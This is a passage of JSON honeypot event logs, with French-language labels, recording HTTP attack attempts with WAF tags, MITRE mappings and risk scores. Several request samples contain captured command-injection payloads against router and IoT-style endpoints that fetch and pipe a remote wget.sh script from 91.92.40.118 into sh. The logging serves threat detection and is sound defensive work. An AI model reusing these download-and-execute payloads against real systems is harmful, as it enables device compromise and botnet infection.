\u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20bi\u2026\u0022, \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20h\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":303},{"id":11809706,"ip":"45.153.34.252","ts":"2026-07-14 02:29:55.000000","proto":"tcp","src_port":35724,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":53,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/diagnostics.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00228e67fddb5ed6834bb822fb7e649cb34fc2111f10\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 334, \u0022payload_entropy\u0022: 5.153721201446656, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 16, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002200455c6f7bc2820bb56bb7cbc17de6252f33ea54\u0022, \u0022event_fingerprint\u0022: \u0022c05bc2168d0110541a20376e77e24a0738e2509b\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0340\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022SSRF Localhost SSRF\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0340\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c15817c71b1b7444b271dc1bb7b4a751\u0022, \u0022path_pattern_hash\u0022: \u00225c6e845fe850f7580662d9806abb9a8a\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: \u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 180\\r\\nConnection: close\\r\\n\\r\\nping=127.0.0.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s airspan;busybox wget http:\/\/91.92.40\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 180\\r\\nConnection: close\\r\\n\\r\\nping=127.0.0.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s airspan;busybox wget http:\/\/91.92.40\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022eb49f830845789776317defc6b2d7296b0811533\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/diagnostics.cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/diagnostics.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":334},{"id":11809704,"ip":"45.153.34.252","ts":"2026-07-14 02:29:54.000000","proto":"tcp","src_port":35700,"dst_port":8081,"service":"http","classification":"rest_api_enum","waf_score":25,"waf_tags":"[\u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022950600:k8s-api\u0022]","http_method":"GET","http_target":"\/api\/v1\/status?command=`cd","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022fe1b4ca446e3c09e254e693f349fd4143361514a\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 245, \u0022payload_entropy\u0022: 5.141591370568365, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 60.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 60.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 61, \u0022tag_count\u0022: 9, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00220dfd21028dbd3a9ba3b11693207e7dfc147d45a3\u0022, \u0022event_fingerprint\u0022: \u00223a7c3d36867c92fc3b650717be5de9b31104267e\u0022, \u0022classification_reason\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-14) \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 137, \u0022precision_signals\u0022: [\u0022MITRE-T1190-api\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022, \u0022INT-api-probe-generic\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1190-api\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022, \u0022INT-api-probe-generic\u0022], \u0022matched_patterns\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0155\u0022, \u0022pat-0103\u0022, \u0022pat-0212\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932190\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022CRS 932206\u0022, \u0022CRS 932321\u0022, \u0022LFI Double-dot bypass\u0022, \u0022Probe \/api\/v1\/\u0022], \u0022pattern_ids\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0144\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0155\u0022, \u0022pat-0103\u0022, \u0022pat-0212\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 60.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 61}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022f2606c5ef7572703c818733654d801ab\u0022, \u0022path_pattern_hash\u0022: \u0022212e3326ed94d54abc342a251f15ffe2\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 61}, \u0022payload_preview\u0022: \u0022GET \/api\/v1\/status?command=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s xiaomi;busybox wget http:\/\/91.92.40.118\/wget.sh -\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/api\/v1\/status\u0022, \u0022query_string\u0022: \u0022command=`cd\u0022, \u0022waf_tags\u0022: [\u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/api\/v1\/status?command=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s xiaomi;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s xiaomi;curl http:\/\/91.92.40.118\/wget.sh|sh -s xiaomi` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/v1\/status?command=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s xiaomi;busybox wget http:\/\/91.92.40.118\/wget.sh 